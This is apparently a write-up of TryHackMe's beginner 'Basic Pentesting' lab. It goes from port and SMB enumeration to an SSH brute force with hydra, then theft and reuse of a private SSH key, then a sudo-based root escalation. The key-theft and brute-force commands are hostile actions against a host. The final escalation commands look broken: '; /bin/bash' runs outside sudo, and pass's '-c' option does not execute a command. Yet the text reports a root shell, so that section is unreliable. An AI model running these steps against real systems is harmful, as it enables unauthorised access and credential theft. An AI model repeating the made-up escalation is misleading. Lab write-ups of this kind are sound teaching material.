TryHackMe: Basic Pentesting CTF Writeup

This writeup covers the Basic Pentesting room on TryHackMe, which is perfect for beginners learning penetration testing fundamentals. The room demonstrates common enumeration techniques, exploitation methods, and privilege escalation vectors.

CTF Methodology

Target Information

  • Room: Basic Pentesting
  • Platform: TryHackMe
  • Difficulty: Easy
  • Target IP: 10.10.X.X (replace with your assigned IP)

Enumeration

Initial Reconnaissance

Let’s start with an Nmap scan to identify open ports and services:

nmap -sC -sV -oN nmap_initial.txt 10.10.X.X

Results:

Starting Nmap 7.93 ( https://nmap.org )
Nmap scan report for 10.10.X.X
Host is up (0.045s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8080/tcp open  http        Apache Tomcat 9.0.7
|_http-title: Apache Tomcat/9.0.7

Great! We have several interesting services:

  • SSH (port 22)
  • HTTP (port 80)
  • SMB (ports 139/445)
  • Tomcat (port 8080)
  • AJP (port 8009)

Web Enumeration

Port 80 Investigation:

Let’s check what’s running on the web server:

curl http://10.10.X.X

Let’s run a directory enumeration:

gobuster dir -u http://10.10.X.X -w /usr/share/wordlists/dirb/common.txt

Results:

/development (Status: 301)

Visiting /development reveals two interesting files:

  • dev.txt - Contains a list of potential usernames
  • j.txt - Contains what appears to be a password

Port 8080 (Tomcat) Investigation:

curl http://10.10.X.X:8080

The default Tomcat page is accessible. Let’s try accessing the manager interface:

gobuster dir -u http://10.10.X.X:8080 -w /usr/share/wordlists/dirb/common.txt

SMB Enumeration

Let’s enumerate the SMB shares:

enum4linux 10.10.X.X
smbclient -L //10.10.X.X -N

Results:

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        Anonymous       Disk      
        IPC$            IPC       IPC Service

We can access the Anonymous share:

smbclient //10.10.X.X/Anonymous -N

Inside the share, we find a staff.txt file containing usernames and potential passwords.

Exploitation

SSH Brute Force

Based on our enumeration, we have:

  • Usernames from /development/dev.txt and SMB share
  • Potential passwords from /development/j.txt and SMB share

Let’s create wordlists and attempt SSH brute force:

hydra -L users.txt -P passwords.txt ssh://10.10.X.X

Success! We find valid credentials: jan:armando

Initial Access

SSH into the target:

ssh [email protected]

We successfully get a shell as the user jan.

Privilege Escalation

System Enumeration

Once on the system, let’s gather information:

# Check current user and groups
whoami
id

# Check sudo permissions
sudo -l

# Find SUID binaries
find / -perm -4000 2>/dev/null

# Check for interesting files
ls -la /home/

Discovering Kay’s Credentials

Exploring the system, we find another user kay. Let’s look for ways to escalate:

# Check for hidden files in jan's home
ls -la /home/jan/

# Look for configuration files
find /home/jan -name ".*" 2>/dev/null

We discover .ssh/id_rsa - a private SSH key!

cat /home/jan/.ssh/id_rsa

Lateral Movement to Kay

The private key might belong to another user. Let’s try using it to access kay:

# Copy the private key to our local machine
scp [email protected]:/home/jan/.ssh/id_rsa ./kay_key

# Set proper permissions
chmod 600 kay_key

# Try to SSH as kay
ssh -i kay_key [email protected]

Success! We can now access the system as kay.

Root Privilege Escalation

Now as kay, let’s check for root escalation paths:

# Check sudo permissions
sudo -l

Result:

(root) NOPASSWD: /usr/bin/pass

Kay can run the pass command as root without a password. The pass utility is a password manager that can execute arbitrary commands.

Exploiting Pass

Let’s abuse the pass command to get root:

# Check pass help
sudo pass --help

# Use pass to execute a shell
sudo pass show test; /bin/bash

Alternatively, we can use the -c option:

sudo pass generate test 10 -c /bin/bash

Root shell achieved!

Finding the Flags

User Flag

cat /home/kay/user.txt

Root Flag

cat /root/root.txt

Summary

This CTF demonstrated several key penetration testing concepts:

  1. Comprehensive Enumeration: We scanned multiple services (HTTP, SMB, SSH)
  2. Information Gathering: Found credentials through web directory enumeration and SMB shares
  3. Credential Reuse: Used discovered credentials for SSH access
  4. Lateral Movement: Found SSH private keys to move between users
  5. Privilege Escalation: Exploited sudo permissions on the pass utility

Key Takeaways

  • Always enumerate thoroughly: Each service can provide valuable information
  • Look for credential reuse: Passwords found in one location often work elsewhere
  • Check user directories: Private keys and configuration files are goldmines
  • Understand sudo permissions: Misconfigured sudo rules are common escalation vectors
  • Research unfamiliar binaries: Tools like pass might have unexpected capabilities

Remediation

  • Remove sensitive information from web directories
  • Secure SMB shares (require authentication)
  • Implement strong password policies
  • Secure SSH keys with proper permissions
  • Review and restrict sudo permissions
  • Regular security audits and penetration testing

Disclaimer: This writeup is for educational purposes only. Always ensure you have proper authorization before testing any system.